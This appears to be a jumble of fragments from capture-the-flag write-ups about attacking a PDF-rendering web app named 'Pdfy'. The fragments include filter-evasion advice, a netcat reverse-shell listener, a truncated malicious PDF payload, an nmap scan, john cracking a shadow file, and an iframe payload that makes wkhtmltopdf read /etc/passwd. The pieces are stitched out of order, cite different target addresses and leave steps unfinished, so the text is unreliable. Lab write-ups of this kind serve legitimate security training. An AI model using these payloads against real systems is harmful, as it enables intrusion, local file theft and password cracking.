ngrok http 8080
Use URL encoding or redirects to evade basic string filters.
Entering a standard URL like http://google.com confirms the functionality—the application fetches the page and returns a PDF version of it.
A netcat listener is set up to receive the reverse shell.
# Define the malicious file contents
malicious_file = "JVBERi0xLjMK…(%PDF-1.3)…"
nmap -sC -sV -oA initial_scan 10.10.11.232
john --single /tmp/shadow
Create a malicious .tex file:
The wkhtmltopdf tool will render the main HTML page and, while processing it, it will attempt to load the <iframe>. The src="file:///etc/passwd" attribute will cause it to read the local file and embed it into the generated PDF.
$ curl -s 10.10.11.206
<!DOCTYPE html>
<html>
<head>
<title>Pdfy</title>
</head>
<body>
<h1>Pdfy</h1>
<p><a href="pdf_file.pdf">Pdf File</a></p>
</body>
</html>